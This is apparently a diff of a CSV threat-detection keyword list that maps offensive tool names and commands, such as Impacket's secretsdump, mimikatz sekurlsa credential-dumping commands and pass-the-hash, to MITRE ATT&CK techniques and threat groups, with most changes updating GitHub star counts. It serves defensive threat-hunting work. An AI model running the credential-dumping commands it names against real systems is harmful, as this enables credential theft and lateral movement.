-"*SecretFinder-master.zip*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in 
JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1524","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" -"*secrets/secrets_manager/secrets.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*secrets_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"*secrets_dump_dcsync*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*SecretFinder.py*","offensive_tool_keyword","secretfinder","SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*SecretFinder-master.zip*","offensive_tool_keyword","secretfinder","SecretFinder is a python 
script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files","T1083 - T1081 - T1113","TA0003 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/m4ll0k/SecretFinder","1","1","N/A","N/A","10","1526","324","2023-06-13T00:49:58Z","2020-06-08T10:50:12Z" +"*secrets/secrets_manager/secrets.txt*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*secrets_dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*secrets_dump_dcsync*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*secretsdump *--silent*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","","N/A","","","" "*secretsdump -sam *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking 
environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*secretsdump*","offensive_tool_keyword","POC","Zerologon CVE exploitation (could be other malicious tools too)","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","555","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" +"*secretsdump*","offensive_tool_keyword","POC","Zerologon CVE exploitation (could be other malicious tools too)","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","6","556","144","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" "*secretsdump.*.pyc*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*secretsdump.py*","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","128","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" -"*secretsdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*secretsdump.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*secretsdump.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" -"*secretsdump.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*secretsdump.py*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*secretsdump.py*","offensive_tool_keyword","POC","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" -"*secretsquirrel/the-backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*secretsquirrel/the-backdoor-factory*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "*sec-shinject *","offensive_tool_keyword","cobaltstrike","Section Mapping Process Injection (secinject): Cobalt Strike BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/apokryptein/secinject","1","0","N/A","10","10","79","20","2022-01-07T21:09:32Z","2021-09-05T01:17:47Z" "*securesocketfunneling*","offensive_tool_keyword","securesocketfunneling","Secure Socket Funneling (SSF) is a network tool and toolkit It provides simple and efficient ways to forward data from multiple sockets (TCP or UDP) through a single secure TLS link to a remote computer","T1071.001 - T1573 - T1572","TA0003 - TA0009 - ","N/A","N/A","POST Exploitation tools","https://securesocketfunneling.github.io/ssf/#home","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*security-onion*","offensive_tool_keyword","security-onion","Security Onion is a free and open source Linux distribution for threat hunting. enterprise security monitoring. and log management. It includes Elasticsearch. Logstash. Kibana. Snort. Suricata. Bro. Wazuh. Sguil. Squert. NetworkMiner. and many other security tools. 
The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes","T1059 - T1059.001 - T1059.003 - T1059.004","TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Infosec Operation system","https://github.com/Security-Onion-Solutions/security-onion","1","1","N/A","N/A","10","3033","534","2021-04-16T12:14:31Z","2015-03-24T20:15:23Z" "*securitywithoutborders*","offensive_tool_keyword","Github Username","pentest documentations","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/securitywithoutborders","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*SeeYouCM-Thief.git*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" "*SeeYouCM-Thief-main*","offensive_tool_keyword","SeeYouCM-Thief","Simple tool to automatically download and parse configuration files from Cisco phone systems searching for SSH credentials","T1110.001 - T1005 - T1071.001","TA0001 - TA0011 - TA0005","N/A","N/A","Discovery","https://github.com/trustedsec/SeeYouCM-Thief","1","1","N/A","9","2","149","30","2023-05-11T01:04:36Z","2022-01-14T20:12:25Z" -"*sekurlsa *","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" 
-"*sekurlsa::backupkeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::bootkey*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::cloudap*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::credman*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::dpapi*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::dpapisystem*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::ekeys*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
This function dumps DPAPI backup keys for users who have logged on to the system","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::kerberos*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::krbtgt*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::livessp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::logonpasswords*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
This function retrieves plaintext credentials from the LSA secrets in memory.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::minidump*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::msv*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::process*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::pth*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. 
hash.This function performs pass-the-hash attacks allowing an attacker to authenticate to a remote system with a stolen hash.","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::ssp*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17798","3445","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" -"*sekurlsa::tickets*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
